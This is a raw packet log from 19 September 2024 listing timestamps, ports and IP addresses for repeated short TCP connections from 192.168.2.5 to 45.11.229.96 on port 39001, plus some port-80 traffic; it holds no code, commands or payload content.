Sep 19, 2024 02:26:42.122251987 CEST	49821	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:42.127000093 CEST	39001	49821	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:42.231992006 CEST	49822	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:42.236864090 CEST	39001	49822	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:42.236962080 CEST	49822	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:42.454473972 CEST	49822	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:42.459494114 CEST	39001	49822	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:42.462068081 CEST	49822	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:42.466892958 CEST	39001	49822	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:42.900383949 CEST	39001	49822	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:42.900449991 CEST	49822	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:42.900566101 CEST	49822	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:42.905317068 CEST	39001	49822	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:43.013210058 CEST	49823	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:43.018201113 CEST	39001	49823	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:43.018300056 CEST	49823	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:43.054259062 CEST	49823	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:43.059102058 CEST	39001	49823	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:43.059186935 CEST	49823	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:43.063972950 CEST	39001	49823	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:43.707876921 CEST	39001	49823	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:43.708007097 CEST	49823	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:43.708096981 CEST	49823	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:43.712873936 CEST	39001	49823	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:43.825908899 CEST	49824	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:43.830818892 CEST	39001	49824	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:43.830909967 CEST	49824	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:43.859906912 CEST	49824	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:43.864694118 CEST	39001	49824	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:43.864770889 CEST	49824	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:43.869530916 CEST	39001	49824	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:44.471287966 CEST	39001	49824	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:44.471391916 CEST	49824	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:44.471506119 CEST	49824	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:44.476222992 CEST	39001	49824	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:44.575773954 CEST	49825	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:44.580730915 CEST	39001	49825	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:44.580852985 CEST	49825	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:44.608480930 CEST	49825	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:44.613281965 CEST	39001	49825	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:44.613360882 CEST	49825	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:44.618170023 CEST	39001	49825	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:45.253648043 CEST	39001	49825	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:45.253746986 CEST	49825	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:45.253861904 CEST	49825	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:45.258757114 CEST	39001	49825	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:45.372678995 CEST	49826	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:45.377747059 CEST	39001	49826	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:45.378215075 CEST	49826	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:45.408602953 CEST	49826	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:45.413516045 CEST	39001	49826	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:45.414190054 CEST	49826	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:45.419056892 CEST	39001	49826	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:45.998852015 CEST	39001	49826	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:45.998950958 CEST	49826	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:45.999042988 CEST	49826	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:46.003894091 CEST	39001	49826	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:46.107937098 CEST	49827	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:46.113002062 CEST	39001	49827	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:46.113109112 CEST	49827	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:46.255227089 CEST	49827	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:46.260102034 CEST	39001	49827	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:46.260211945 CEST	49827	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:46.265161991 CEST	39001	49827	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:46.761035919 CEST	39001	49827	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:46.761132002 CEST	49827	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:46.761229038 CEST	49827	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:46.766002893 CEST	39001	49827	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:46.872601986 CEST	49828	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:46.877500057 CEST	39001	49828	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:46.877589941 CEST	49828	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:46.911216974 CEST	49828	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:46.916238070 CEST	39001	49828	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:46.916302919 CEST	49828	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:46.921262980 CEST	39001	49828	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:47.513137102 CEST	39001	49828	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:47.513344049 CEST	49828	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:47.513391018 CEST	49828	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:47.518176079 CEST	39001	49828	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:47.622586012 CEST	49829	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:47.627641916 CEST	39001	49829	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:47.627734900 CEST	49829	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:47.652214050 CEST	49829	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:47.657032967 CEST	39001	49829	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:47.657118082 CEST	49829	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:47.661969900 CEST	39001	49829	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:48.291212082 CEST	39001	49829	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:48.291374922 CEST	49829	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:48.291516066 CEST	49829	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:48.298778057 CEST	39001	49829	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:48.403898954 CEST	49830	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:48.408930063 CEST	39001	49830	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:48.409168005 CEST	49830	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:48.441395998 CEST	49830	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:48.446365118 CEST	39001	49830	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:48.446443081 CEST	49830	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:48.453807116 CEST	39001	49830	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:49.055435896 CEST	39001	49830	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:49.055639982 CEST	49830	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:49.055742979 CEST	49830	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:49.062208891 CEST	39001	49830	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:49.170284033 CEST	49831	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:49.175178051 CEST	39001	49831	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:49.175260067 CEST	49831	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:49.884968996 CEST	49831	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:49.889864922 CEST	39001	49831	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:49.892266035 CEST	49831	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:49.897120953 CEST	39001	49831	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:50.270355940 CEST	39001	49831	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:50.270436049 CEST	49831	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:50.270628929 CEST	49831	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:50.276047945 CEST	39001	49831	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:50.388286114 CEST	49832	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:50.393074036 CEST	39001	49832	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:50.393182993 CEST	49832	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:50.562896013 CEST	49832	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:50.572635889 CEST	39001	49832	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:50.572720051 CEST	49832	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:50.577914000 CEST	39001	49832	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:51.036552906 CEST	39001	49832	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:51.036617041 CEST	49832	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:51.036721945 CEST	49832	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:51.041498899 CEST	39001	49832	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:51.154141903 CEST	49833	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:51.159121037 CEST	39001	49833	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:51.159228086 CEST	49833	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:51.384583950 CEST	49833	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:51.656222105 CEST	39001	49833	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:51.656306982 CEST	49833	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:51.661207914 CEST	39001	49833	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:52.072657108 CEST	39001	49833	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:52.072726965 CEST	49833	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:52.072859049 CEST	49833	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:52.077675104 CEST	39001	49833	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:52.381182909 CEST	49834	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:52.386162996 CEST	39001	49834	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:52.386876106 CEST	49834	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:52.435686111 CEST	49834	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:52.440845966 CEST	39001	49834	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:52.441087961 CEST	49834	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:52.446352959 CEST	39001	49834	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:53.071860075 CEST	39001	49834	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:53.071985006 CEST	49834	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:53.073715925 CEST	49834	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:53.078541994 CEST	39001	49834	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:53.185251951 CEST	49835	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:53.193336010 CEST	39001	49835	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:53.193475962 CEST	49835	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:53.219559908 CEST	49835	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:53.224482059 CEST	39001	49835	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:53.225128889 CEST	49835	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:53.230067968 CEST	39001	49835	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:53.818660975 CEST	39001	49835	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:53.818773985 CEST	49835	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:53.818875074 CEST	49835	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:53.823699951 CEST	39001	49835	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:53.935347080 CEST	49836	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:53.940342903 CEST	39001	49836	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:53.940455914 CEST	49836	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:53.973789930 CEST	49836	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:53.978869915 CEST	39001	49836	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:53.978935957 CEST	49836	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:53.983795881 CEST	39001	49836	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:54.603003025 CEST	39001	49836	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:54.603229046 CEST	49836	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:54.603327990 CEST	49836	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:54.608207941 CEST	39001	49836	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:55.073983908 CEST	49837	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:55.078922033 CEST	39001	49837	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:55.078993082 CEST	49837	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:55.231090069 CEST	49837	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:55.236076117 CEST	39001	49837	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:55.236135006 CEST	49837	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:55.240958929 CEST	39001	49837	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:55.560619116 CEST	80	49718	45.76.89.70	192.168.2.5
Sep 19, 2024 02:26:55.579083920 CEST	80	49718	45.76.89.70	192.168.2.5
Sep 19, 2024 02:26:55.579159975 CEST	49718	80	192.168.2.5	45.76.89.70
Sep 19, 2024 02:26:55.753634930 CEST	39001	49837	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:55.753863096 CEST	49837	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:55.753916979 CEST	49837	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:55.758759975 CEST	39001	49837	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:55.872572899 CEST	49838	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:55.877640009 CEST	39001	49838	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:55.877726078 CEST	49838	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:55.903081894 CEST	49838	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:55.907915115 CEST	39001	49838	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:55.907994986 CEST	49838	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:55.913079023 CEST	39001	49838	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:56.587888956 CEST	39001	49838	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:56.587980986 CEST	49838	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:56.588093996 CEST	49838	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:56.593003988 CEST	39001	49838	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:56.700825930 CEST	49839	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:56.706767082 CEST	39001	49839	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:56.706872940 CEST	49839	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:56.736644030 CEST	49839	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:56.741621017 CEST	39001	49839	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:56.741697073 CEST	49839	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:56.746606112 CEST	39001	49839	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:57.377993107 CEST	39001	49839	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:57.378220081 CEST	49839	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:57.378861904 CEST	49839	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:57.383794069 CEST	39001	49839	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:57.548418045 CEST	49840	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:57.553540945 CEST	39001	49840	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:57.553620100 CEST	49840	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:57.754652977 CEST	49840	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:57.884021997 CEST	39001	49840	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:57.884099007 CEST	49840	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:57.889053106 CEST	39001	49840	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:58.212766886 CEST	39001	49840	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:58.212856054 CEST	49840	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:58.212982893 CEST	49840	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:58.217793941 CEST	39001	49840	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:58.326364040 CEST	49841	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:58.331309080 CEST	39001	49841	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:58.331430912 CEST	49841	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:58.503254890 CEST	49841	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:58.508250952 CEST	39001	49841	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:58.508343935 CEST	49841	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:58.513186932 CEST	39001	49841	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:58.954992056 CEST	39001	49841	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:58.955064058 CEST	49841	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:58.955183983 CEST	49841	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:58.960114002 CEST	39001	49841	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:59.060476065 CEST	49842	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:59.065509081 CEST	39001	49842	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:59.065603971 CEST	49842	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:59.213079929 CEST	49842	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:59.333493948 CEST	39001	49842	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:59.333570004 CEST	49842	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:59.342843056 CEST	39001	49842	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:59.716042995 CEST	39001	49842	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:59.716137886 CEST	49842	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:59.716223955 CEST	49842	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:59.721024036 CEST	39001	49842	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:59.827001095 CEST	49843	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:59.831970930 CEST	39001	49843	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:59.832063913 CEST	49843	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:59.861366034 CEST	49843	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:59.866183996 CEST	39001	49843	45.11.229.96	192.168.2.5
Sep 19, 2024 02:26:59.866252899 CEST	49843	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:26:59.871184111 CEST	39001	49843	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:00.468823910 CEST	39001	49843	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:00.468894958 CEST	49843	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:00.469028950 CEST	49843	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:00.473802090 CEST	39001	49843	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:00.578481913 CEST	49844	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:00.583422899 CEST	39001	49844	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:00.583534002 CEST	49844	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:00.630167961 CEST	49844	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:00.635088921 CEST	39001	49844	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:00.635158062 CEST	49844	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:00.640073061 CEST	39001	49844	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:01.101716042 CEST	80	49718	45.76.89.70	192.168.2.5
Sep 19, 2024 02:27:01.168795109 CEST	49718	80	192.168.2.5	45.76.89.70
Sep 19, 2024 02:27:01.247098923 CEST	39001	49844	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:01.247226954 CEST	49844	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:01.247313023 CEST	49844	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:01.252052069 CEST	39001	49844	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:01.357059002 CEST	49845	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:01.364788055 CEST	39001	49845	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:01.364887953 CEST	49845	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:01.394619942 CEST	49845	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:01.399770975 CEST	39001	49845	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:01.399863958 CEST	49845	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:01.404762983 CEST	39001	49845	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:01.995879889 CEST	39001	49845	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:01.995979071 CEST	49845	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:01.996069908 CEST	49845	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:02.001176119 CEST	39001	49845	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:02.107121944 CEST	49846	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:02.112045050 CEST	39001	49846	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:02.112138033 CEST	49846	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:02.191910028 CEST	49846	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:02.196846962 CEST	39001	49846	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:02.196907997 CEST	49846	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:02.201791048 CEST	39001	49846	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:02.748862028 CEST	39001	49846	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:02.748980999 CEST	49846	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:02.757249117 CEST	49846	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:02.762069941 CEST	39001	49846	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:02.918494940 CEST	49847	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:02.923358917 CEST	39001	49847	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:02.923451900 CEST	49847	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:02.999046087 CEST	49847	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:03.004532099 CEST	39001	49847	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:03.004606962 CEST	49847	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:03.009429932 CEST	39001	49847	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:03.574198961 CEST	39001	49847	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:03.574290037 CEST	49847	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:03.574376106 CEST	49847	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:03.580199957 CEST	39001	49847	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:03.687119961 CEST	49848	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:03.692037106 CEST	39001	49848	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:03.692132950 CEST	49848	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:03.728267908 CEST	49848	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:03.733117104 CEST	39001	49848	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:03.734066010 CEST	49848	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:03.738878012 CEST	39001	49848	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:04.373126030 CEST	39001	49848	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:04.373188019 CEST	49848	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:04.373290062 CEST	49848	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:04.378094912 CEST	39001	49848	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:04.482237101 CEST	49849	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:04.487266064 CEST	39001	49849	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:04.487365007 CEST	49849	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:04.532980919 CEST	49849	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:04.537981987 CEST	39001	49849	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:04.538069963 CEST	49849	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:04.542879105 CEST	39001	49849	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:05.110234022 CEST	39001	49849	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:05.110460043 CEST	49849	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:05.110460043 CEST	49849	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:05.115454912 CEST	39001	49849	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:05.216489077 CEST	49850	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:05.221410036 CEST	39001	49850	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:05.221481085 CEST	49850	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:05.271992922 CEST	49850	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:05.276842117 CEST	39001	49850	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:05.277017117 CEST	49850	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:05.281851053 CEST	39001	49850	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:05.890223980 CEST	39001	49850	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:05.890429974 CEST	49850	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:05.890429974 CEST	49850	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:05.895443916 CEST	39001	49850	45.11.229.96	192.168.2.5
